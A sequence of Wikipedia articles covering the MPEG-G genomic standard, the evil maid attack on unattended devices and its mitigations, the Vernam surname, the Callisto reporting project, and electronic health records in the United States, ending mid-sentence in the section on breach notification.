ISO/IEC 23092-4 MPEG-G Part 4 ISO/IEC 23092-4 specifies genomic information representation reference software, referred to as the genomic model (GM). It consists of two components: the reference encoder software and the reference decoder software. While the reference decoder software is provided to assess the conformance to the requirements of ISO/IEC 23092-1, ISO/IEC 23092-2 and ISO/IEC 23092-6, the reference encoder software serves as a guide for the implementation of the aforementioned standards. The reference encoder software called Genie is an open source software developed by a group of individuals from multiple universities and companies around the world. It features the following components: ISO/IEC 23092-5 MPEG-G Part 5 To be defined. ISO/IEC 23092-6 MPEG-G Part 6 To be defined. Filename extensions To be defined. See also MPEG ISO/IEC JTC 1/SC 29 References External links mpeg-g.org MPEG web site ISO/IEC 23092-1 ISO/IEC 23092-2 ISO/IEC 23092-3 ISO/IEC 23092-4 ISO/IEC 23092-5 ISO/IEC 23092-6 ISO/IEC standards Open standards covered by patents
58574904
https://en.wikipedia.org/wiki/Evil%20maid%20attack
Evil maid attack
An evil maid attack is an attack on an unattended device, in which an attacker with physical access alters it in some undetectable way so that they can later access the device, or the data on it. The name refers to the scenario where a maid could subvert a device left unattended in a hotel room – but the concept itself also applies to situations such as a device being intercepted while in transit, or taken away temporarily by airport or law enforcement personnel. Overview Origin In a 2009 blog post, security analyst Joanna Rutkowska coined the term "Evil Maid Attack"; due to hotel rooms being a common place where devices are left unattended. The post detailed a method for compromising the firmware on an unattended computer via an external USB flash drive – and therefore bypassing TrueCrypt disk encryption. D. Defreez, a computer security professional, first mentioned the possibility of an evil maid attack on Android smartphones in 2011. He talked about the WhisperCore Android distribution and its ability to provide disk encryption for Androids. Notability In 2007, former U.S. Commerce Secretary Carlos Gutierrez was allegedly targeted by an evil maid attack during a business trip to China. He left his computer unattended during a trade talk in Beijing, and he suspected that his device had been compromised. Although the allegations have yet to be confirmed or denied, the incident caused the U.S. government to be more wary of physical attacks. In 2009, Symantec CTO Mark Bregman was advised by several U.S. agencies to leave his devices in the U.S. before travelling to China. He was instructed to buy new ones before leaving and dispose of them when he returned so that any physical attempts to retrieve data would be ineffective. Methods of attack Classic evil maid The attack begins when the victim leaves their device unattended. The attacker can then proceed to tamper with the system. If the victim's device does not have password protection or authentication, an intruder can turn on the computer and immediately access the victim's information. However, if the device is password protected, as with full disk encryption, the firmware of the device needs to be compromised, usually done with an external drive. The compromised firmware often provides the victim with a fake password prompt identical to the original. Once the password is input, the compromised firmware sends the password to the attacker and removes itself after a reboot. In order to successfully complete the attack, the attacker must return to the device once it has been unattended a second time to steal the now-accessible data. Another method of attack is through a DMA attack in which an attacker accesses the victim's information through hardware devices that connect directly to the physical address space. The attacker simply needs to connect to the hardware device in order to access the information. Network evil maid An evil maid attack can also be done by replacing the victim's device with an identical device. If the original device has a bootloader password, then the attacker only needs to acquire a device with an identical bootloader password input screen. If the device has a lock screen, however, the process becomes more difficult as the attacker must acquire the background picture to put on the lock screen of the mimicking device. In either case, when the victim inputs their password on the false device, the device sends the password to the attacker, who is in possession of the original device. The attacker can then access the victim's data. Vulnerable interfaces Legacy BIOS Legacy BIOS is considered insecure against evil maid attacks. Its architecture is old, updates and Option ROMs are unsigned, and configuration is unprotected. Additionally, it does not support secure boot. These vulnerabilities allow an attacker to boot from an external drive and compromise the firmware. The compromised firmware can then be configured to send keystrokes to the attacker remotely. Unified Extensible Firmware Interface Unified Extensible Firmware Interface (UEFI) provides many necessary features for mitigating evil maid attacks. For example, it offers a framework for secure boot, authenticated variables at boot-time, and TPM initialization security. Despite these available security measures, platform manufacturers are not obligated to use them. Thus, security issues may arise when these unused features allow an attacker to exploit the device. Full disk encryption systems Many full disk encryption systems, such as TrueCrypt and PGP Whole Disk Encryption, are susceptible to evil maid attacks due to their inability to authenticate themselves to the user. An attacker can still modify disk contents despite the device being powered off and encrypted. The attacker can modify the encryption system's loader codes to steal passwords from the victim. The ability to create a communication channel between the bootloader and the operating system to remotely steal the password for a disk protected by FileVault 2, is also explored. On a macOS system, this attack has additional implications due to “password forwarding” technology, in which a user's account password also serves as the FileVault password, enabling an additional attack surface through privilege escalation. Thunderbolt In 2019 a vulnerability named "Thunderclap" in Intel Thunderbolt ports found on many PCs was announced which could allow a rogue actor to gain access to the system via direct memory access (DMA). This is possible despite use of an input/output memory management unit (IOMMU). This vulnerability was largely patched by vendors. This was followed in 2020 by "Thunderspy" which is believed to be unpatchable and allows similar exploitation of DMA to gain total access to the system bypassing all security features. Any unattended device Any unattended device can be vulnerable to a network evil maid attack. If the attacker knows the victim's device well enough, they can replace the victim's device with an identical model with a password-stealing mechanism. Thus, when the victim inputs their password, the attacker will instantly be notified of it and be able to access the stolen device's information. Mitigation Detection One approach is to detect that someone is close to, or handling the unattended device. Proximity alarms, motion detector alarms, and wireless cameras, can be used to alert the victim when an attacker is nearby their device, thereby nullifying the surprise factor of an evil maid attack. The Haven Android app was created in 2017 by Edward Snowden to do such monitoring, and transmit the results to the user's smartphone. In the absence of the above, tamper-evident technology of various kinds can be used to detect whether the device has been taken apart – including the low-cost solution of putting glitter nail polish over the screw holes. After an attack has been suspected, the victim can have their device checked to see if any malware was installed, but this is challenging. Suggested approaches are checking the hashes of selected disk sectors and partitions. Prevention If the device is under surveillance at all times, an attacker cannot perform an evil maid attack. If left unattended, the device may also be placed inside a lockbox so that an attacker will not have physical access to it. However, there will be situations, such as a device being taken away temporarily by airport or law enforcement personnel where this is not practical. Basic security measures such as having the latest up-to-date firmware and shutting down the device before leaving it unattended prevent an attack from exploiting vulnerabilities in legacy architecture and allowing external devices into open ports, respectively. CPU-based disk encryption systems, such as TRESOR and Loop-Amnesia, prevent data from being vulnerable to a DMA attack by ensuring it does not leak into system memory. TPM-based secure boot has been shown to mitigate evil maid attacks by authenticating the device to the user. It does this by unlocking itself only if the correct password is given by the user and if it measures that no unauthorized code has been executed on the device. These measurements are done by root of trust systems, such as Microsoft's BitLocker and Intel's TXT technology. The Anti Evil Maid program builds upon TPM-based secure boot and further attempts to authenticate the device to the user. See also Cold boot attack References Computer security exploits Spyware Cyberwarfare Security breaches
58607025
https://en.wikipedia.org/wiki/Vernam
Vernam
Vernam is a surname. Notable people with the surname include: Charles Vernam (born 1996), English professional footballer Gilbert Vernam (1890–1960), invented an additive polyalphabetic stream cipher and later co-invented an automated one-time pad cipher Remington D. B. Vernam (1896–1918), American pilot and World War I flying ace Remington Vernam (land developer) (1843–1907), American lawyer and real-estate developer from New York, founder of the community of Arverne See also Vernam Field, former World War II United States Army Air Forces airfield in Clarendon Parish, west-south-west of Kingston, Jamaica Vernam cipher, an encryption technique that cannot be cracked, but needs a one-time pre-shared key at least as long as the message being sent Enam (disambiguation) Erna (disambiguation) Vena (disambiguation) Vera (disambiguation) Verna (disambiguation)
58627038
https://en.wikipedia.org/wiki/Callisto%20%28project%29
Callisto (project)
Callisto is a nonprofit organization project aimed at allowing individuals to anonymously report sexual assault. Created by Jessica Ladd, the organization has developed a website that allows users to submit a time stamped record of the alleged offense, and if another individual files a report about the same perpetrator, will alert the authorities. The site uses a third party encryption software to flag the reports of the victims. Since its release, Callisto has received criticism for its policies towards reporting to authorities and over concerns of its database being hacked. The Process When users report alleged assaults, they have the opportunity to be in an environment they feel comfortable in. The reporters are encouraged to take breaks so that they do not become overwhelmed. The report does not have to be in chronological order. No one will be able to access the report, unless the filer grants access. Once the report has been submitted, there are three outcomes. The system will notify the authorities as well as the college, only if two victims report the same assailant. The reporter may forward the record to the school. If the victim chooses, they may take the report to the authorities. Reception Callisto is considered a tool in helping to reduce sexual assault. Other methods for reducing this crime include an online sexual assault course that colleges require students to take, apps that students can download to tell them local crime hot spots and more. Most colleges have “blue light poles” in case of emergency, and have a night ride service so that no one has to walk alone. Callisto’s biggest competitor is Lighthouse. Callisto’s approach is sensitive to trauma when reporting. Callisto had an app at one point, but took it down so that there was no shame in having it on your phone. It is now only offered online 24/7 so it is easily accessible and confidential. Callisto believes that there is safety in numbers and that no one is alone. Criticism Since the data collected from Callisto is stored on a database by a third party, critics are worried that this information could potentially be hacked and the victims identities revealed. There is not a guarantee that just because you report to Callisto, your case will be investigated. Since there has to be at least one match to alert the authorities, the cases that never get matched will never be ingested through Callisto. Callisto would like victims to produce some form of identification when reporting, such as the perpetrators Facebook page, email, or phone number. Analysts do not like this aspect of the website, as gathering personal information about the attack could be overwhelming, or even trigger the victim. Callisto could be accused of crowd-sourcing, taking away from the individual and their story References External links Sexual violence
58751479
https://en.wikipedia.org/wiki/Electronic%20health%20records%20in%20the%20United%20States
Electronic health records in the United States
Federal and state governments, insurance companies and other large medical institutions are heavily promoting the adoption of electronic health records. The US Congress included a formula of both incentives (up to $44,000 per physician under Medicare, or up to $65,000 over six years under Medicaid) and penalties (i.e. decreased Medicare and Medicaid reimbursements to doctors who fail to use EMRs by 2015, for covered patients) for EMR/EHR adoption versus continued use of paper records as part of the Health Information Technology for Economic and Clinical Health (HITECH) Act, enacted as part of the, American Recovery and Reinvestment Act of 2009. The 21st Century Cures Act, passed in 2016, prohibited information blocking, which had slowed interoperability. In 2018, the Trump administration announced the MyHealthEData initiative to further allow for patients to receive their health records. The federal Office of the National Coordinator for Health Information Technology leads these efforts. One VA study estimates its electronic medical record system may improve overall efficiency by 6% per year, and the monthly cost of an EMR may (depending on the cost of the EMR) be offset by the cost of only a few "unnecessary" tests or admissions. Jerome Groopman disputed these results, publicly asking "how such dramatic claims of cost-saving and quality improvement could be true". A 2014 survey of the American College of Physicians member sample, however, found that family practice physicians spent 48 minutes more per day when using EMRs. 90% reported that at least 1 data management function was slower after EMRs were adopted, and 64% reported that note writing took longer. A third (34%) reported that it took longer to find and review medical record data, and 32% reported that it was slower to read other clinicians' notes. Coverage In a 2008 survey by DesRoches et al. of 4484 physicians (62% response rate), 83% of all physicians, 80% of primary care physicians, and 86% of non-primary care physicians had no EHRs. "Among the 83% of respondents who did not have electronic health records, 16%" had bought, but not implemented an EHR system yet. The 2009 National Ambulatory Medical Care Survey of 5200 physicians (70% response rate) by the National Center for Health Statistics showed that 51.7% of office-based physicians did not use any EMR/EHR system. In the United States, the CDC reported that the EMR adoption rate had steadily risen to 48.3 percent at the end of 2009. This is an increase over 2008 when only 38.4% of office-based physicians reported using fully or partially electronic medical record systems (EMR) in 2008. However, the same study found that only 20.4% of all physicians reported using a system described as minimally functional and including the following features: orders for prescriptions, orders for tests, viewing laboratory or imaging results, and clinical progress notes. As of 2013, 78 percent of office physicians are using basic electronic medical records. As of 2014, more than 80 percent of hospitals in the U.S.have adopted some type of EHR. Though within a hospital, the type of EHR data and mix varies significantly. Types of EHR data used in hospitals include structured data (e.g., medication information) and unstructured data (e.g., clinical notes). The healthcare industry spends only 2% of gross revenues on Health Information Technology (HIT), which is low compared to other information intensive industries such as finance, which spend upwards of 10%. The usage of electronic medical records can vary depending on who the user is and how they are using it. Electronic medical records can help improve the quality of medical care given to patients. Many doctors and office-based physicians refuse to get rid of traditional paper records. Harvard University has conducted an experiment in which they tested how doctors and nurses use electronic medical records to keep their patients' information up to date. The studies found that electronic medical records were very useful; a doctor or a nurse was able to find a patient's information fast and easy just by typing their name; even if it was misspelled. The usage of electronic medical records increases in some workplaces due to the ease of use of the system; whereas the president of the Canadian Family Practice Nurses Association says that using electronic medical records can be time-consuming, and it isn't very helpful due to the complexity of the system. Beth Israel Deaconess Medical Center reported that doctors and nurses prefer to use a much more friendly user software due to the difficulty and time it takes for medical staff to input the information as well as to find a patients information. A study was done and the amount of information that was recorded in the EMRs was recorded; about 44% of the patient's information was recorded in the EMRs. This shows that EMRs are not very efficient most of the time. The cost of implementing an EMR system for smaller practices has also been criticized; data produced by the Robert Wood Johnson Foundation demonstrates that the first-year investment for an average five-person practice is $162,000 followed by about $85,000 in maintenance fees. Despite this, tighter regulations regarding meaningful use criteria and national laws (Health Information Technology for Economic and Clinical Health Act and the Affordable Care Act) have resulted in more physicians and facilities adopting EMR systems: Software, hardware and other services for EMR system implementation are provided for cost by various companies including Dell. Open source EMR systems exist but have not seen widespread adoption of open-source EMR system software. Beyond financial concerns there are a number of legal and ethical dilemmas created by increasing EMR use, including the risk of medical malpractice due to user error, server glitches that result in the EMR not being accessible, and increased vulnerability to hackers. Legal status Electronic medical records, like other medical records, must be kept in unaltered form and authenticated by the creator. Under data protection legislation, the responsibility for patient records (irrespective of the form they are kept in) is always on the creator and custodian of the record, usually a health care practice or facility. This role has been said to require changes such that the sole medico-legal record should be held elsewhere. The physical medical records are the property of the medical provider (or facility) that prepares them. This includes films and tracings from diagnostic imaging procedures such as X-ray, CT, PET, MRI, ultrasound, etc. The patient, however, according to HIPAA, has a right to view the originals, and to obtain copies under law. The Health Information Technology for Economic and Clinical Health Act (HITECH) (,§2.A.III & B.4) (a part of the 2009 stimulus package) set meaningful use of interoperable EHR adoption in the health care system as a critical national goal and incentivized EHR adoption. The "goal is not adoption alone but 'meaningful use' of EHRs—that is, their use by providers to achieve significant improvements in care." Title IV of the act promises maximum incentive payments for Medicaid to those who adopt and use "certified EHRs" of $63,750 over 6 years beginning in 2011. Eligible professionals must begin receiving payments by 2016 to qualify for the program. For Medicare the maximum payments are $44,000 over 5 years. Doctors who do not adopt an EHR by 2015 will be penalized 1% of Medicare payments, increasing to 3% over 3 years. In order to receive the EHR stimulus money, the HITECH Act requires doctors to show "meaningful use" of an EHR system. As of June 2010, there were no penalty provisions for Medicaid. In 2017 the government announced its first False Claims Act settlement with an electronic health records vendor for misrepresenting its ability to meet “meaningful use” standards and therefore receive incentive payments. eClinicalWorks paid $155 million to settle charges that it had failed to meet all government requirements, failed to adequately test its software, failed to fix certain bugs, failed to ensure data portability, and failed to reliably record laboratory and diagnostic imaging orders. The government also alleged that eClinicalWorks paid kickbacks to influential customers who recommended its products. The case marks the first time the government applied the federal Anti-Kickback Statute law to the promotion and sale of an electronic health records system. The False Claims Act lawsuit was brought by a whistleblower who was a New York City employee implementing eClinicalWorks’ system at Rikers Island Correctional Facility when he became aware of the software flaws. His “qui tam” case was later joined by the government. Notably, CMS has said it will not punish eClinicalWorks clients that "in good faith" attested to using the software. Health information exchange (HIE) has emerged as a core capability for hospitals and physicians to achieve "meaningful use" and receive stimulus funding. Healthcare vendors are pushing HIE as a way to allow EHR systems to pull disparate data and function on a more interoperable level. Starting in 2015, hospitals and doctors will be subject to financial penalties under Medicare if they are not using electronic health records. Goals and objectives Improve care quality, safety, efficiency, and reduce health disparities Quality and safety measurement Clinical decision support (automated advice) for providers Patient registries (e.g., "a directory of patients with diabetes") Improve care coordination Engage patients and families in their care Improve population and public health Electronic laboratory reporting for reportable conditions (hospitals) Immunization reporting to immunization registries Syndromic surveillance (health event awareness) Ensure adequate privacy and security protections Quality Studies call into question whether, in real life, EMRs improve the quality of care. 2009 produced several articles raising doubts about EMR benefits. A major concern is the reduction of physician-patient interaction due to formatting constraints. For example, some doctors have reported that the use of check-boxes has led to fewer open-ended questions. Meaningful use The main components of meaningful use are: The use of a certified EHR in a meaningful manner, such as e-prescribing. The use of certified EHR technology for the electronic exchange of health information to improve the quality of health care. The use of certified EHR technology to submit clinical quality and other measures. In other words, providers need to show they're using certified EHR technology in ways that can be measured significantly in quality and in quantity. The meaningful use of EHRs intended by the US government incentives is categorized as follows: Improve care coordination Reduce healthcare disparities Engage patients and their families Improve population and public health Ensure adequate privacy and security The Obama Administration's Health IT program intends to use federal investments to stimulate the market of electronic health records: Incentives: to providers who use IT Strict and open standards: To ensure users and sellers of EHRs work towards the same goal Certification of software: To provide assurance that the EHRs meet basic quality, safety, and efficiency standards The detailed definition of "meaningful use" is to be rolled out in 3 stages over a period of time until 2017. Details of each stage are hotly debated by various groups. Meaningful use Stage 1 The first steps in achieving meaningful use are to have a certified electronic health record (EHR) and to be able to demonstrate that it is being used to meet the requirements. Stage 1 contains 25 objectives/measures for Eligible Providers (EPs) and 24 objectives/measures for eligible hospitals. The objectives/measures have been divided into a core set and menu set. EPs and eligible hospitals must meet all objectives/measures in the core set (15 for EPs and 14 for eligible hospitals). EPs must meet 5 of the 10 menu-set items during Stage 1, one of which must be a public health objective. Full list of the Core Requirements and a full list of the Menu Requirements. Core Requirements: Use computerized order entry for medication orders. Implement drug-drug, drug-allergy checks. Generate and transmit permissible prescriptions electronically. Record demographics. Maintain an up-to-date problem list of current and active diagnoses. Maintain active medication list. Maintain active medication allergy list. Record and chart changes in vital signs. Record smoking status for patients 13 years old or older. Implement one clinical decision support rule. Report ambulatory quality measures to CMS or the States. Provide patients with an electronic copy of their health information upon request. Provide clinical summaries to patients for each office visit. Capability to exchange key clinical information electronically among providers and patient authorized entities. Protect electronic health information (privacy & security) Menu Requirements: Implement drug-formulary checks. Incorporate clinical lab-test results into certified EHR as structured data. Generate lists of patients by specific conditions to use for quality improvement, reduction of disparities, research, and outreach. Send reminders to patients per patient preference for preventive/ follow-up care Provide patients with timely electronic access to their health information (including lab results, problem list, medication lists, allergies) Use certified EHR to identify patient-specific education resources and provide to the patient if appropriate. Perform medication reconciliation as relevant Provide a summary care record for transitions in care or referrals. Capability to submit electronic data to immunization registries and actual submission. Capability to provide electronic syndromic surveillance data to public health agencies and actual transmission. To receive federal incentive money, CMS requires participants in the Medicare EHR Incentive Program to "attest" that during a 90-day reporting period, they used a certified EHR and met Stage 1 criteria for meaningful use objectives and clinical quality measures. For the Medicaid EHR Incentive Program, providers follow a similar process using their state's attestation system. Meaningful use Stage 2 The government released its final ruling on achieving Stage 2 of meaningful use in August 2012. Eligible providers will need to meet 17 of 20 core objectives in Stage 2, and fulfill three out of six menu objectives. The required percentage of patient encounters that meet each objective has generally increased over the Stage 1 objectives. While Stage 2 focuses more on information exchange and patient engagement, many large EHR systems have this type of functionality built into their software, making it easier to achieve compliance. Also, for those eligible providers who have successfully attested to Stage 1, meeting Stage 2 should not be as difficult, as it builds incrementally on the requirements for the first stage. Meaningful use Stage 3 On March 20, 2015 CMS released its proposed rule for Stage 3 meaningful use. These new rules focus on some of the tougher aspects of Stage 2 and require healthcare providers to vastly improve their EHR adoption and care delivery by 2018. Barriers to adoption Costs The price of EMR and provider uncertainty regarding the value they will derive from adoption in the form of return on investment have a significant influence on EMR adoption. In a project initiated by the Office of the National Coordinator for Health Information, surveyors found that hospital administrators and physicians who had adopted EMR noted that any gains in efficiency were offset by reduced productivity as the technology was implemented, as well as the need to increase information technology staff to maintain the system. The U.S. Congressional Budget Office concluded that the cost savings may occur only in large integrated institutions like Kaiser Permanente, and not in small physician offices. They challenged the Rand Corporation's estimates of savings. Office-based physicians in particular may see no benefit if they purchase such a product—and may even suffer financial harm. Even though the use of health IT could generate cost savings for the health system at large that might offset the EMR's cost, many physicians might not be able to reduce their office expenses or increase their revenue sufficiently to pay for it. For example. the use of health IT could reduce the number of duplicated diagnostic tests. However, that improvement in efficiency would be unlikely to increase the income of many physicians. ...Given the ease at which information can be exchanged between health IT systems, patients whose physicians use them may feel that their privacy is more at risk than if paper records were used. Doubts have been raised about cost saving from EMRs by researchers at Harvard University, the Wharton School of the University of Pennsylvania, Stanford University, and others. Start-up costs In a survey by DesRoches et al. (2008), 66% of physicians without EHRs cited capital costs as a barrier to adoption, while 50% were uncertain about the investment. Around 56% of physicians without EHRs stated that financial incentives to purchase and/or use EHRs would facilitate adoption. In 2002, initial costs were estimated to be $50,000–70,000 per physician in a 3-physician practice. Since then, costs have decreased with increasing adoption. A 2011 survey estimated a cost of $32,000 per physician in a 5-physician practice during the first 60 days of implementation. One case study by Miller et al. (2005) of 14 small primary-care practices found that the average practice paid for the initial and ongoing costs within 2.5 years. A 2003 cost-benefit analysis found that using EMRs for 5 years created a net benefit of $86,000 per provider. Some physicians are skeptical of the positive claims and believe the data is skewed by vendors and others with an interest in EHR implementation. Brigham and Women's Hospital in Boston, Massachusetts, estimated it achieved net savings of $5 million to $10 million per year following installation of a computerized physician order entry system that reduced serious medication errors by 55 percent. Another large hospital generated about $8.6 million in annual savings by replacing paper medical charts with EHRs for outpatients and about $2.8 million annually by establishing electronic access to laboratory results and reports. Maintenance costs Maintenance costs can be high. Miller et al. found the average estimated maintenance cost was $8500 per FTE health-care provider per year. Furthermore, software technology advances at a rapid pace. Most software systems require frequent updates, sometimes even server upgrades, and often at a significant ongoing cost. Some types of software and operating systems require full-scale re-implementation periodically, which disrupts not only the budget but also workflow. Costs for upgrades and associated regression testing can be particularly high where the applications are governed by FDA regulations (e.g. Clinical Laboratory systems). Physicians desire modular upgrades and ability to continually customize, without large-scale reimplementation. Training costs Training of employees to use an EHR system is costly, just as for training in the use of any other hospital system. New employees, permanent or temporary, will also require training as they are hired. In the United States, a substantial majority of healthcare providers train at a VA facility sometime during their career. With the widespread adoption of the Veterans Health Information Systems and Technology Architecture (VistA) electronic health record system at all VA facilities, fewer recently-trained medical professionals will be inexperienced in electronic health record systems. Older practitioners who are less experienced in the use of electronic health record systems will retire over time. Software quality and usability deficiencies The Healthcare Information and Management Systems Society, a very large U.S. health care IT industry trade group, observed that EMR adoption rates "have been slower than expected in the United States, especially in comparison to other industry sectors and other developed countries. A key reason, aside from initial costs and lost productivity during EMR implementation, is lack of efficiency and usability of EMRs currently available." The U.S. National Institute of Standards and Technology of the Department of Commerce studied usability in 2011 and lists a number of specific issues that have been reported by health care workers. The U.S. military's EMR "AHLTA" was reported to have significant usability issues. Lack of semantic interoperability In the United States, there are no standards for semantic interoperability of health care data; there are only syntactic standards. This means that while data may be packaged in a standard format (using the pipe notation of HL7, or the bracket notation of XML), it lacks definition, or linkage to a common shared dictionary. The addition of layers of complex information models (such as the HL7 v3 RIM) does not resolve this fundamental issue. As of 2018, Fast Healthcare Interoperability Resources was a leading interoperability standard, and the Argonaut Project is a privately sponsored interoperability initiative. In 2017, Epic Systems announced Share Everywhere, which lets providers access medical information through a portal; their platform was described as "closed" in 2014, with competitors sponsoring the CommonWell Health Alliance. The economics of sharing have been blamed for the lack of interoperability, as limited data sharing can help providers retain customers. Implementations In the United States, the Department of Veterans Affairs (VA) has the largest enterprise-wide health information system that includes an electronic medical record, known as the Veterans Health Information Systems and Technology Architecture (VistA). A key component in VistA is their VistA imaging System which provides a comprehensive multimedia data from many specialties, including cardiology, radiology, and orthopedics. A graphical user interface known as the Computerized Patient Record System (CPRS) allows health care providers to review and update a patient's electronic medical record at any of the VA's over 1,000 healthcare facilities. CPRS includes the ability to place orders, including medications, special procedures, X-rays, patient care nursing orders, diets, and laboratory tests. The 2003 National Defense Authorization Act (NDAA) ensured that the VA and DoD would work together to establish a bidirectional exchange of reference quality medical images. Initially, demonstrations were only worked in El Paso, Texas, but capabilities have been expanded to six different locations of VA and DoD facilities. These facilities include VA polytrauma centers in Tampa and Richmond, Denver, North Chicago, Biloxi, and the National Capitol Area medical facilities. Radiological images such as CT scans, MRIs, and x-rays are being shared using the BHIE. Goals of the VA and DoD in the near future are to use several image sharing solutions (VistA Imaging and DoD Picture Archiving & Communications System (PACS) solutions). Clinical Data Repository/Health Data Repository (CDHR) is a database that allows for the sharing of patient records, especially allergy and pharmaceutical information, between the Department of Veteran Affairs (VA) and the Department of Defense (DoD) in the United States. The program shares data by translating the various vocabularies of the information being transmitted, allowing all of the VA facilities to access and interpret the patient records. The Laboratory Data Sharing and Interoperability (LDSI) application is a new program being implemented to allow sharing at certain sites between the VA and DoD of "chemistry and hematology laboratory tests". Unlike the CHDR, the LDSI is currently limited in its scope. One attribute for the start of implementing EHRs in the States is the development of the Nationwide Health Information Network which is a work in progress and still being developed. This started with the North Carolina Healthcare Information and Communication Alliance founded in 1994 and who received funding from Department of Health and Human Services. The Department of Veterans Affairs and Kaiser Permanente has a pilot program to share health records between their systems VistA and HealthConnect, respectively. This software called 'CONNECT' uses Nationwide Health Information Network standards and governance to make sure that health information exchanges are compatible with other exchanges being set up throughout the country. CONNECT is an open-source software solution that supports electronic health information exchange. The CONNECT initiative is a Federal Health Architecture project that was conceived in 2007 and initially built by 20 various federal agencies and now comprises more than 500 organizations including federal agencies, states, healthcare providers, insurers, and health IT vendors. The US Indian Health Service uses an EHR similar to Vista called RPMS. VistA Imaging is also being used to integrate images and co-ordinate PACS into the EHR system. In Alaska, use of the EHR by the Kodiak Area Native Association has improved screening services and helped the organization reach all 21 clinical performance measures defined by the Indian Health Service as required by the Government Performance and Results Act. Privacy and confidentiality In the United States in 2011 there were 380 major data breaches involving 500 or more patients' records listed on the website kept by the United States Department of Health and Human Services (HHS) Office for Civil Rights. So far, from the first wall postings in September 2009 through the latest on 8 December 2012, there have been 18,059,831 "individuals affected," and even that massive number is an undercount of the breach problem. The civil rights office has not released all of the records of tens of thousands of breaches in the United States, it has received under a federal reporting mandate on breaches affecting fewer than 500 patients per incident. Privacy concerns in healthcare apply to both paper and electronic records. According to the Los Angeles Times, roughly 150 people (from doctors and nurses to technicians and billing clerks) have access to at least part of a patient's records during a hospitalization, and 600,000 payers, providers and other entities that handle providers' billing data have some access also. Recent revelations of "secure" data breaches at centralized data repositories, in banking and other financial institutions, in the retail industry, and from government databases, have caused concern about storing electronic medical records in a central location. Records that are exchanged over the Internet are subject to the same security concerns as any other type of data transaction over the Internet. The Health Insurance Portability and Accountability Act (HIPAA) was passed in the US in 1996 to establish rules for access, authentications, storage and auditing, and transmittal of electronic medical records. This standard made restrictions for electronic records more stringent than those for paper records. However, there are concerns as to the adequacy of these standards. In the United States, information in electronic medical records is referred to as Protected Health Information (PHI) and its management is addressed under the Health Insurance Portability and Accountability Act (HIPAA) as well as many local laws. The HIPAA protects a patient's information; the information that is protected under this act are: information doctors and nurses input into the electronic medical record, conversations between a doctor and a patient that may have been recorded, as well as billing information. Under this act there is a limit as to how much information can be disclosed, and as well as who can see a patient's information. Patients also get to have a copy of their records if they desire, and get notified if their information is ever to be shared with third parties. Covered entities may disclose protected health information to law enforcement officials for law enforcement purposes as required by law (including court orders, court-ordered warrants, subpoenas) and administrative requests; or to identify or locate a suspect, fugitive, material witness, or missing person. Medical and health care providers experienced 767 security breaches resulting in the compromised confidential health information of 23,625,933 patients during the period of 2006–2012. One major issue that has risen on the privacy of the US network for electronic health records is the strategy to secure the privacy of patients. Former US president George W. Bush called for the creation of networks, but federal investigators report that there is no clear strategy to protect the privacy of patients as the promotions of the electronic medical records expands throughout the United States. In 2007, the Government Accountability Office reports that there is a "jumble of studies and vague policy statements but no overall strategy to ensure that privacy protections would be built into computer networks linking insurers, doctors, hospitals and other health care providers." The privacy threat posed by the interoperability of a national network is a key concern. One of the most vocal critics of EMRs, New York University Professor Jacob M. Appel, has claimed that the number of people who will need to have access to such a truly interoperable national system, which he estimates to be 12 million, will inevitably lead to breaches of privacy on a massive scale. Appel has written that while "hospitals keep careful tabs on who accesses the charts of VIP patients," they are powerless to act against "a meddlesome pharmacist in Alaska" who "looks up the urine toxicology on his daughter's fiance in Florida, to check if the fellow has a cocaine habit." This is a significant barrier for the adoption of an EHR. Accountability among all the parties that are involved in the processing of electronic transactions including the patient, physician office staff, and insurance companies, is the key to successful advancement of the EHR in the US Supporters of EHRs have argued that there needs to be a fundamental shift in "attitudes, awareness, habits, and capabilities in the areas of privacy and security" of individual's health records if adoption of an EHR is to occur. According to The Wall Street Journal, the DHHS takes no action on complaints under HIPAA, and medical records are disclosed under court orders in legal actions such as claims arising from automobile accidents. HIPAA has special restrictions on psychotherapy records, but psychotherapy records can also be disclosed without the client's knowledge or permission, according to the Journal. For example, Patricia Galvin, a lawyer in San Francisco, saw a psychologist at Stanford Hospital & Clinics after her fiance committed suicide. Her therapist had assured her that her records would be confidential. But after she applied for disability benefits, Stanford gave the insurer her therapy notes, and the insurer denied her benefits based on what Galvin claims was a misinterpretation of the notes. Within the private sector, many companies are moving forward in the development, establishment, and implementation of medical record banks and health information exchange. By law, companies are required to follow all HIPAA standards and adopt the same information-handling practices that have been in effect for the federal government for years. This includes two ideas, standardized formatting of data electronically exchanged and federalization of security and privacy practices among the private sector. Private companies have promised to have "stringent privacy policies and procedures." If protection and security are not part of the systems developed, people will not trust the technology nor will they participate in it. There is also debate over ownership of data, where private companies tend to value and protect data rights, but the patients referenced in these records may not have knowledge that their information is being used for commercial purposes. In 2013, reports based on documents released by Edward Snowden revealed that the NSA had succeeded in breaking the encryption codes protecting electronic health records, among other databases. In 2015, 4.5 million health records were hacked at UCLA Medical Center. In 2018, Social Indicators Research published the scientific evidence of 173,398,820 (over 173 million) individuals affected in USA from October 2008 (when the data were collected) to September 2017 (when the statistical analysis took place). Regulatory compliance Health Level 7 In the United States, reimbursement for many healthcare services is based upon the extent to which specific work by healthcare providers is documented in the patient's medical record. Enforcement authorities in the United States have become concerned that functionality available in many electronic health records, especially copy-and-paste, may enable fraudulent claims for reimbursement. The authorities are concerned that healthcare providers may easily use these systems to create documentation of medical care that did not actually occur. These concerns came to the forefront in 2012, in a joint letter from the U.S. Departments of Justice and Health and Human Services to the American hospital community. The American Hospital Association responded, focusing on the need for clear guidance from the government regarding permissible and prohibited conduct using electronic health records. In a December 2013 audit report, the U.S. HHS Office of the Inspector General (OIG) issued an audit report reiterating that vulnerabilities continue to exist in the operation of electronic health records. The OIG's 2014 Workplan indicates an enhanced focus on providers' use of electronic health records. Medical data breach The Security Rule, according to Health and Human Services (HHS), establishes a security framework for small practices as well as large institutions. All covered entities must have a written security plan. The HHS identifies three components as necessary for the security plan: administrative safeguards, physical safeguards, and technical safeguards. However, medical and healthcare providers have experienced 767 security breaches resulting in the compromised confidential health information of 23,625,933 patients during the period of 2006–2012. The Health Insurance Portability and Accessibility Act requires safeguards to limit the number of people who have access to personal information. However, given the number of people who may have access to your information as part of the operations and business of the health care provider or plan, there is no realistic way to estimate the number of people who may come across your records. Additionally, law enforcement access is authorized under the act. In some cases, medical information may be disclosed without a warrant or court order. Breach notification The Security Rule that was adopted in 2005 did not require breach notification. However, notice might be required by state laws that apply to a variety of industries, including health care providers. In California, a law has been in place since 2003 requiring that a HIPAA covered organization's breach 